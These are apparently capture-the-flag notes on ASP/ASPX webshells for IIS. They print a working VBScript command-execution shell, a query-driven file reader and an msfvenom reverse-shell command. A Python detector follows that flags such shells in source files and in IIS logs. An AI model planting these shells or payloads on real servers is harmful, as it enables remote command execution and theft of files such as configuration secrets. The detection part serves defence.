Notes on ASP/ASPX shells on IIS: found a great PDF on this topic by Joseph Giron.
The document details some old-school methods of interacting with the server-side process. We still need a way to get the ASP code onto the server somehow; in CTFs this is usually done via read/write FTP access or RFI.
- ASP shell in VBScript, using WScript.Shell to execute a command taken from the URL query string.
  Example:

  <%
  Set command = Request.QueryString("cmd")
  If command = "" Then
      Response.Write("No Command Entered!")
  Else
      Set objWShell = CreateObject("WScript.Shell")
      Set objCmd = objWShell.Exec(command)
      strPResult = objCmd.StdOut.ReadAll()
      Set objCmd = Nothing: Set objWShell = Nothing
      Response.Write(strPResult)
  End If
  %>
- If WScript.Shell is blocked, try using FileSystemObject instead to read a file named in the URL query string:

  <%
  Response.Write("Full directory path is: <br /><strong>")
  Response.Write(Server.MapPath("."))
  Response.Write("</strong><br />")

  Sub ReadDisplayFile(FileToRead)
      ourfile = Server.MapPath(FileToRead)
      Set fs = CreateObject("Scripting.FileSystemObject")
      Set thisfile = fs.OpenTextFile(ourfile, 1, False)
      tempSTR = thisfile.ReadAll
      Response.Write(tempSTR)
      thisfile.Close
      Set thisfile = Nothing
      Set fs = Nothing
  End Sub

  ourfile = Request.QueryString("file")
  If ourfile = "" Then
      Response.Write("No file specified!")
  Else
      Call ReadDisplayFile(ourfile)
  End If
  %>
- Another option is to just generate the ASPX payload with msfvenom:

  msfvenom -p windows/shell_reverse_tcp -f aspx --smallest lhost=x.x.x.x lport=4141 -o iishelp.aspx
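Defender-side view of the three items above, as an added example that is not part of these notes or of Joseph Giron's paper. The Python below does two things: it classifies an ASP/ASPX source file by whether a command-execution or file-access primitive (WScript.Shell, Exec, Scripting.FileSystemObject, System.Diagnostics.Process) is fed from Request input, which is the exact shape of both shells above, and it parses IIS W3C log lines and flags requests to script files that carry cmd=/file= style parameters or that write a script via PUT (the upload step the notes mention). All source snippets and log lines are constructed; the indicator regexes and the SUSPECT_PARAMS list are my assumptions, not a complete signature set.

```python
"""Detection side of the ASP/ASPX webshell patterns in these notes.
Added example, not from the notes or Joseph Giron's paper; all sample
source text and IIS log lines below are constructed for illustration."""
import re
from urllib.parse import parse_qs

# Assumed indicator set (not exhaustive): each server-side primitive that a
# webshell needs, plus the request-input accessor that feeds it.
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "filesystemobject": re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "exec_call": re.compile(r'\.Exec\s*\(', re.I),
    "dotnet_process": re.compile(r'System\.Diagnostics\.Process|Process\.Start\s*\(', re.I),
    "request_input": re.compile(r'Request\.(QueryString|Form|Item)\s*\(', re.I),
}
DANGEROUS = {"wscript_shell", "filesystemobject", "exec_call", "dotnet_process"}

def classify_asp_source(src):
    """Return (verdict, matched indicator names) for one ASP/ASPX source text.
    A dangerous primitive reachable from request input is the webshell shape."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    if "request_input" in hits and DANGEROUS & set(hits):
        return "webshell_likely", hits
    if DANGEROUS & set(hits):
        return "review", hits
    return "clean", hits

def parse_iis_w3c(lines):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields header."""
    fields, records = None, []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            records.append(dict(zip(fields, line.split())))
    return records

SCRIPT_EXT = re.compile(r'\.(asp|aspx|asa|ashx|asmx)$', re.I)
SUSPECT_PARAMS = {"cmd", "command", "file", "exec"}   # assumed; mirrors the shells above

def flag_requests(records):
    """Flag script requests carrying shell-style parameters, or script writes via PUT/MOVE."""
    flagged = []
    for r in records:
        uri, method = r.get("cs-uri-stem", ""), r.get("cs-method", "").upper()
        query = r.get("cs-uri-query", "-")          # IIS logs "-" for an empty query
        if not SCRIPT_EXT.search(uri):
            continue
        reasons = []
        params = {k.lower() for k in parse_qs("" if query == "-" else query, keep_blank_values=True)}
        if params & SUSPECT_PARAMS:
            reasons.append("shell_param:" + ",".join(sorted(params & SUSPECT_PARAMS)))
        if method in ("PUT", "MOVE"):
            reasons.append("script_write_via_" + method)
        if reasons:
            flagged.append((r.get("c-ip"), method, uri, reasons))
    return flagged

# Constructed samples: one ordinary dynamic page, one minimal command shell, one log excerpt.
BENIGN_ASP = '<% Response.Write("Hello " & Server.HTMLEncode(Request.QueryString("name"))) %>'
SHELL_ASP = ('<% Set command = Request.QueryString("cmd")\n'
             'Set objWShell = CreateObject("WScript.Shell")\n'
             'Set objCmd = objWShell.Exec(command) %>')
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:00 203.0.113.5 GET /default.aspx - 200
2024-01-01 10:00:05 203.0.113.5 PUT /uploads/iishelp.aspx - 201
2024-01-01 10:00:09 203.0.113.5 GET /uploads/cmd.asp cmd=dir 200
2024-01-01 10:00:12 198.51.100.7 GET /read.asp file=web.config 200
""".splitlines()

def run_samples():
    """Run both checks over the constructed samples (used by the stand-alone demo)."""
    return {
        "benign": classify_asp_source(BENIGN_ASP),
        "shell": classify_asp_source(SHELL_ASP),
        "flagged": flag_requests(parse_iis_w3c(SAMPLE_LOG)),
    }

if __name__ == "__main__":
    for key, value in run_samples().items():
        print(key, value)
```

Run it over the ASP files in the webroot and over the W3C logs. A file whose only hit is request_input is normal dynamic page code; a request_input hit together with one of the dangerous primitives is the shape of both shells above, and a PUT of a script file followed shortly by requests to that file with a cmd= parameter is the upload-then-use sequence the notes describe. Legitimate admin tooling can match too, so treat "review" as a triage queue rather than a verdict.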